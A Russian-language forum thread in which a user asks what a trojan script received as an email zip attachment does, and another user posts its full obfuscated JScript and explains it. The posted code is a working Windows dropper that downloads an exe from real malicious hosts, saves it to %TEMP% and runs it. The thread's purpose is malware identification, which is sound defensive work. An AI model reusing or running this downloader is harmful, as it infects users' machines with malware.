Гость
Войти | Профиль | Очистить
Целевая тема:
Создать новую тему:
Автор:
Действия ...
Форумы / Java [игнор отключен] [закрыт для гостей] / Скрипт / 4 сообщений из 4, страница 1 из 1
11.12.2015, 10:22
    #39125587
PaulWist
PaulWist
Участник
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Скрипт
Братцы, помогите разобраться чЁ хочет скрипт-троян (насколько он "безобиден" ), ... приходит как аттач zip-архива на почтовый сервер.

Выкладываю его текст в сообщении как txt-файл, если надо могу выложить в теле сообщения.
...
Рейтинг: 0 / 0
| Ответить | Цитировать | Написать  
11.12.2015, 10:37
    #39125602
Blazkowicz
Blazkowicz
Участник
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Скрипт
Такое очучение, что других форумов кроме Java нет. Чего только не спрашивают.
Вот такой там скрипт запускается: Пытается скачать какой-то exe-шник и запустить.

Код: javascript
1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
13.
14.
15.
16.
17.
18.
19.
20.
21.
22.
23.
24.
25.
26.
27.
28.
29.
30.
31.
32.
33.
34.
35.
36.
37.
38.
39.
40.
41.
42.
43.
44.
45.
46.
47.
48.
49.
50.
var E = "softextrain64.com/86.exe? 46.151.52.196/86.exe? ? ?".split(" ");
var kvd = ((1/*r7Dr463629596n448324uM354193eOiZ*/) ? "WScri" : "") + "pt.Shell";
var Fi = WScript.CreateObject(kvd);
var Ce = "%TEMP%\\";
var dQD = Fi.ExpandEnvironmentStrings(Ce);
var GjZ = "2.XMLH";
var ukN = GjZ + "TTP";
var Cp = true, KVpF = "ADOD";
var nm = WScript.CreateObject("MS" + "XML" + (511519, ukN));
var kaM = WScript.CreateObject(KVpF + "B.St" + (72710, "ream"));
var WFE = 0;
var B = 1;
var gTaUUaj = 194813;
for (var j = WFE; j < E.length; j++) {
    var Tv = 0;
    try {
        poi = "GET";
        nm.open(poi, "http://" + E[j] + B, false);
        nm.send();
        if (nm.status == 779 - 579) {
            kaM.open();
            kaM.type = 1;
            kaM.write(nm.responseBody);
            if (kaM.size > 16575 - 212) {
                Tv = 1;
                kaM.position = 0;
                kaM.saveToFile/*uQi927B2AT*/(dQD/*l69w15w1MX*/ + gTaUUaj + ".exe", 4 - 2);
                try {
                    if (((new Date()) > 0, 7915459888)) {
                        Fi./*d995853FIVo*/Run(dQD + gTaUUaj + /*ZFx670u5BN*/".exe", /*qReb35f8A1*/3 - 2, 0);
                        break;
                    }
                } catch (Nc) {
                }
                ;
            }
            ;
            kaM.close();
        }
        ;
        if (Tv == 1) {
            WFE = j;
            break;
        }
        ;
    } catch (Nc) {
    }
    ;
}
;



Судя по всему, для IE эксплоит
https://msdn.microsoft.com/en-us/library/at5ydy31(v=vs.84).aspx
...
Рейтинг: 0 / 0
| Ответить | Цитировать | Написать  
11.12.2015, 10:40
    #39125608
Blazkowicz
Blazkowicz
Участник
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Скрипт
авторThe malware is known as Trojan.Win32.Swizzor.1!O, HEUR/QVM10.1.Malware.Gen or Mal/Wonton-BX.
По softextrain64.com легко найти описание вируса
...
Рейтинг: 0 / 0
| Ответить | Цитировать | Написать  
11.12.2015, 11:12
    #39125646
PaulWist
PaulWist
Участник
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Скрипт
BlazkowiczавторThe malware is known as Trojan.Win32.Swizzor.1!O, HEUR/QVM10.1.Malware.Gen or Mal/Wonton-BX.
По softextrain64.com легко найти описание вируса

Большое русское мерси!!! :)

PS сами мы не местные в js не понимаем вАще .

Ещё раз, большое спасибо!
...
Рейтинг: 0 / 0
| Ответить | Цитировать | Написать  
Форумы / Java [игнор отключен] [закрыт для гостей] / Скрипт / 4 сообщений из 4, страница 1 из 1
Найденые пользователи ...
Разблокировать пользователей ...
Читали тему (0):
Читали форум (0):
Пользователи онлайн (0):
Польз. соглашение  
Полит. конфиден.  
созд. / загр.: 412ms
Закрыть
start [/forum/topic.php?fid=59&tablet=1&tid=2124567]:
 0ms
get settings:
 7ms
get forum list:
 17ms
check forum access:
 3ms
check topic access:
 3ms
track hit:
 152ms
get topic data:
 6ms
get forum data:
 1ms
get page messages:
 21ms
get tp. blocked users:
 1ms
others: 201ms
total:  412ms
x
x
Закрыть


Просмотр
0 / 0
Close
Debug Console [Select Text]